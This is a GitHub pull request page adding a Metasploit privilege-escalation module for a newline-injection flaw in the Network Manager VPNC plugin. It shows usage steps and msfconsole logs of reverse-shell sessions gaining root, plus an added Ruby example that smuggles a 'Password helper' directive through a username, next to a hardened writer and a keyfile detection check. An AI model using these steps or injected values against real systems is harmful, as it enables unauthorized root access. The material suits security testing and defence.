
Add Network Manager VPNC Username Privilege Escalation module #10482

Merged
merged 2 commits into from Aug 30, 2018

Conversation

bcoles
Contributor

@bcoles bcoles commented Aug 19, 2018

Add Network Manager VPNC Username Privilege Escalation module.

    This module exploits an injection vulnerability in the Network Manager
    VPNC plugin to gain root privileges.

    This module uses a new line injection vulnerability in the configured
    username for a VPN network connection to inject a `Password helper`
    configuration directive into the connection configuration.

    The specified helper is executed by Network Manager as root when the
    connection is started.

    Network Manager VPNC versions prior to 1.2.6 are vulnerable.

    This module has been tested successfully with VPNC versions:
    1.2.4-4 on Debian 9.0.0 (x64); and
    1.1.93-1 on Ubuntu Linux 16.04.4 (x64).

  1. Start msfconsole
  2. Get a session
  3. Do: use exploit/linux/local/network_manager_vpnc_username_priv_esc
  4. Do: set SESSION [SESSION]
  5. Do: run
  6. You should get a new root session

msf5 > use exploit/linux/local/network_manager_vpnc_username_priv_esc 
msf5 exploit(linux/local/network_manager_vpnc_username_priv_esc) > set session 1
session => 1
msf5 exploit(linux/local/network_manager_vpnc_username_priv_esc) > set verbose true
verbose => true
msf5 exploit(linux/local/network_manager_vpnc_username_priv_esc) > set lhost 172.16.191.188 
lhost => 172.16.191.188
msf5 exploit(linux/local/network_manager_vpnc_username_priv_esc) > run

[*] Started reverse TCP handler on 172.16.191.188:4444 
[+] nmcli utility is installed
[*] Adding VPN connection...
[*] Uploading payload...
[*] Writing '/tmp/.4FCA0Pp4tw' (237 bytes) ...
[*] Starting VPN connection...
[*] Transmitting intermediate stager...(106 bytes)
[*] Sending stage (861480 bytes) to 172.16.191.201
[+] Deleted /tmp/.4FCA0Pp4tw
[*] Removing VPN connection...

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer     : 172.16.191.201
OS           : Ubuntu 16.04 (Linux 4.13.0-41-generic)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter > 

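The injection the module relies on, as an added example in Ruby that is not part of the Metasploit module or of NetworkManager's code: a toy writer that builds a vpnc-style configuration (one `Key value` directive per line) from stored connection settings, showing how a username containing a line break smuggles in a `Password helper` directive, beside a hardened writer that rejects line breaks before anything is written, plus a defender-side check over a NetworkManager keyfile. The directive names (`IPSec gateway`, `IPSec ID`, `Xauth username`, `Password helper`), the keyfile layout, its `\n` escaping of newlines, and all sample values are assumptions made for this example, not taken from the module or from the page.

```ruby
# Added example (not code from the Metasploit module or NetworkManager):
# models how a line-oriented vpnc configuration is built from connection
# settings and why an unvalidated username becomes an extra directive.

# Directive names assumed for this toy config format (a subset of vpnc's).
VPNC_KEYS = ['IPSec gateway', 'IPSec ID', 'Xauth username', 'Password helper'].freeze

class UnsafeValueError < StandardError; end

# Vulnerable writer: interpolates stored values verbatim, one directive per line.
def serialize_vpnc_config_unsafe(settings)
  [
    "IPSec gateway #{settings['gateway']}",
    "IPSec ID #{settings['group']}",
    "Xauth username #{settings['username']}"
  ].join("\n") + "\n"
end

# Reject carriage returns and line feeds in any value before it is written.
def validate_vpnc_value(name, value)
  raise UnsafeValueError, "#{name} contains a line break" if value =~ /[\r\n]/
  value
end

# Hardened writer: same output as the unsafe one for clean input, error otherwise.
def serialize_vpnc_config_safe(settings)
  gateway  = validate_vpnc_value('gateway', settings['gateway'])
  group    = validate_vpnc_value('group', settings['group'])
  username = validate_vpnc_value('username', settings['username'])
  "IPSec gateway #{gateway}\nIPSec ID #{group}\nXauth username #{username}\n"
end

# Convenience for callers that want a boolean instead of an exception.
def safe_serializer_rejects?(settings)
  serialize_vpnc_config_safe(settings)
  false
rescue UnsafeValueError
  true
end

# Read the config back the way a line-oriented consumer would: each line is
# "Key value", matched against the known keys. Returns [[key, value], ...].
def parse_vpnc_config(text)
  directives = []
  text.each_line do |raw|
    line = raw.chomp
    next if line.empty?
    key = VPNC_KEYS.find { |k| line.start_with?("#{k} ") }
    next unless key
    directives << [key, line[(key.length + 1)..-1]]
  end
  directives
end

# Every "Password helper" path the consumer would go on to execute.
def helper_directives(text)
  parse_vpnc_config(text).select { |key, _| key == 'Password helper' }.map { |_, value| value }
end

# Defender-side check over a NetworkManager keyfile. Format assumed here:
# INI-style sections, VPN data as key=value lines under [vpn], and a newline
# inside a value stored as the two characters "\n" (GKeyFile-style escaping).
# Returns the names of [vpn] keys whose value carries an escaped line break
# or a helper directive.
def suspicious_vpn_keyfile_values(keyfile_text)
  findings = []
  section = nil
  keyfile_text.each_line do |raw|
    line = raw.chomp
    if line =~ /\A\[(.+)\]\z/
      section = Regexp.last_match(1)
      next
    end
    next unless section == 'vpn'
    key, sep, value = line.partition('=')
    next if sep.empty?
    if value.include?('\\n') || value.include?('\\r') || value.include?('Password helper')
      findings << key.strip
    end
  end
  findings
end

if __FILE__ == $PROGRAM_NAME
  # Constructed settings: the username carries the injected directive.
  settings = {
    'gateway'  => 'vpn.example.test',
    'group'    => 'corp',
    'username' => "alice\nPassword helper /tmp/.helper"
  }
  cfg = serialize_vpnc_config_unsafe(settings)
  puts cfg
  puts "helpers that would run: #{helper_directives(cfg).inspect}"
  puts "hardened writer rejects it: #{safe_serializer_rejects?(settings)}"
end
```

The hardened writer only closes the line-break channel the module uses; a real fix should validate every value that ends up in the helper's configuration at the point it is accepted (here, when the connection is added), not only at write time, and the keyfile check is a cheap triage step for existing connections rather than a substitute for patching.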
@space-r7 space-r7 self-assigned this Aug 29, 2018
@space-r7
Contributor

Tested on Ubuntu 16.04:

msf5 exploit(linux/local/network_manager_vpnc_username_priv_esc) > set session 3
session => 3
msf5 exploit(linux/local/network_manager_vpnc_username_priv_esc) > set verbose true
verbose => true
msf5 exploit(linux/local/network_manager_vpnc_username_priv_esc) > run

[*] Started reverse TCP handler on 192.168.37.1:4444 
[+] nmcli utility is installed
[*] Adding VPN connection...
[*] Uploading payload...
[*] Writing '/tmp/.CgNExsftqfT0zr1' (237 bytes) ...
[*] Starting VPN connection...
[*] Transmitting intermediate stager...(106 bytes)
[*] Sending stage (861480 bytes) to 192.168.37.1
[*] Meterpreter session 4 opened (192.168.37.1:4444 -> 192.168.37.1:53711) at 2018-08-30 10:19:45 -0500
[*] Removing VPN connection...
[+] Deleted /tmp/.CgNExsftqfT0zr1

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer     : 172.16.215.148
OS           : Ubuntu 16.04 (Linux 4.15.0-29-generic)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter >

@space-r7 space-r7 merged commit f09148d into rapid7:master Aug 30, 2018
space-r7 added a commit that referenced this pull request Aug 30, 2018
@space-r7
Contributor

space-r7 commented Aug 30, 2018

Release Notes

A module that exploits an injection vulnerability in the Network Manager VPNC plugin has been added to the framework. It can be used to gain root privileges.

@bcoles bcoles deleted the network_manager_vpnc_username_priv_esc branch August 31, 2018 08:38
@tdoan-r7 tdoan-r7 added rn-enhancement release notes enhancement rn-exploit and removed rn-enhancement release notes enhancement labels Sep 12, 2018